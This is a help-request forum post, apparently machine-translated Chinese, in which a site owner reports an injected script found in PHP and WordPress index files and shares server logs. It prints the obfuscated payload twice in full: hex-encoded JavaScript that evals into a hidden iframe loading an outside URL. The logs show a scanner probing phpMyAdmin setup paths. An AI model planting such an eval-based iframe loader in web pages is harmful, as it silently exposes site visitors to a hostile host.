有一天,我的Q &我的网站的一部分出现故障,因此我关闭索引,发现错误与语法错误有关。所以我抹去了它并使它死亡。然而,当我打开一看,我发现:这是一个可能的黑客攻击?
<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f616d65726963616e6d6f62696c652e63612f666f72756d2e7068703f74703d36373565616665633433316231663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>httpdocs/');<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f616d65726963616e6d6f62696c652e63612f666f72756d2e7068703f74703d36373565616665633433316231663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>
我发现它以后在多个PHP网站(如WordPress的指数),我想知道的是,如果有人知道它来自哪里,什么它的目的是。
我发现这个在我的日志也一样,它看起来可疑:
87.106.166.95 - - [19/Jul/2011:00:03:14 +0400] "GET //typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 301 552 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:15 +0400] "GET //phpadmin/scripts/setup.php HTTP/1.1" 301 544 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:16 +0400] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 301 546 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:16 +0400] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 474 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:17 +0400] "GET //phpmyadmin1/scripts/setup.php HTTP/1.1" 301 547 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:18 +0400] "GET //phpmyadmin2/scripts/setup.php HTTP/1.1" 301 547 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:18 +0400] "GET //pma/scripts/setup.php HTTP/1.1" 301 539 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:19 +0400] "GET //web/phpMyAdmin/scripts/setup.php HTTP/1.1" 301 550 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:20 +0400] "GET //xampp/phpmyadmin/scripts/setup.php HTTP/1.1" 301 552 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:20 +0400] "GET //web/scripts/setup.php HTTP/1.1" 301 539 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:21 +0400] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 301 548 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:22 +0400] "GET //websql/scripts/setup.php HTTP/1.1" 301 542 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:22 +0400] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 474 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:22 +0400] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 301 546 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:23 +0400] "GET //phpMyAdmin-2/scripts/setup.php HTTP/1.1" 301 548 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:24 +0400] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 301 548 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:24 +0400] "GET //sqlmanager/scripts/setup.php HTTP/1.1" 301 546 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:25 +0400] "GET //mysqlmanager/scripts/setup.php HTTP/1.1" 301 548 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:26 +0400] "GET //p/m/a/scripts/setup.php HTTP/1.1" 301 541 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:26 +0400] "GET //PMA2005/scripts/setup.php HTTP/1.1" 301 543 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:27 +0400] "GET //pma2005/scripts/setup.php HTTP/1.1" 301 543 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:28 +0400] "GET //phpmanager/scripts/setup.php HTTP/1.1" 301 546 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:28 +0400] "GET //php-myadmin/scripts/setup.php HTTP/1.1" 301 547 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:29 +0400] "GET //phpmy-admin/scripts/setup.php HTTP/1.1" 301 547 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:30 +0400] "GET //webadmin/scripts/setup.php HTTP/1.1" 301 544 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:30 +0400] "GET //sqlweb/scripts/setup.php HTTP/1.1" 301 542 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:31 +0400] "GET //websql/scripts/setup.php HTTP/1.1" 301 542 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:32 +0400] "GET //webdb/scripts/setup.php HTTP/1.1" 301 541 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:32 +0400] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 301 546 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:33 +0400] "GET //mysql-admin/scripts/setup.php HTTP/1.1" 301 547 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:33 +0400] "GET //databaseadmin/scripts/setup.php HTTP/1.1" 301 549 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:34 +0400] "GET //admm/scripts/setup.php HTTP/1.1" 301 540 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:35 +0400] "GET //admn/scripts/setup.php HTTP/1.1" 301 540 "-" "-"
谢谢你的回复 –